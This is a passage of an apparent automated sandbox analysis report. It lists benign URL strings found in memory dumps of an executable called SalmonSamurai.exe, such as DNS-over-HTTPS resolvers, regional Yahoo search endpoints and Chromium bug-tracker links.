Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cl.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cl.search.yahoo.com/favicon.icohttps://cl.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cl.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cl.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cleanbrowsing.org/privacy
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://co.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://co.search.yahoo.com/favicon.icohttps://co.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://co.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://co.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://coccoc.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://coccoc.com/favicon.icohttps://coccoc.com/search#query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://coccoc.com/search#query=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1161355
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1214923
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1237175
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1313172
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/1338622.
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1016
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1071
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1083
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1203
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1216
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1264
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1276
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1289
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1302
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1305
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/136
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1389
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1393
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/145
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1462
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1473
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1487
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/155
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1563
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1564
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/1579
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/193
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/237
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/27
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/271
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/286
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/342
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/343
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/36
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/402
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/42
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/434
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/480
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/537
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/549
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/56
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/582
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/633
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/666
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/667
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/673
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/727
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/776
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/792
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/838
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/840
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/949
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/960
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/dawn/966
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/new
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreating
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/tint.
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://crbug.com/tint/1003
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dawn.googlesource.com/dawn/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/favicon.icohttps://de.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dl.gmx.com/apps/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dl.gmx.com/apps/favicon.icohttps://search.gmx.com/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.google/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
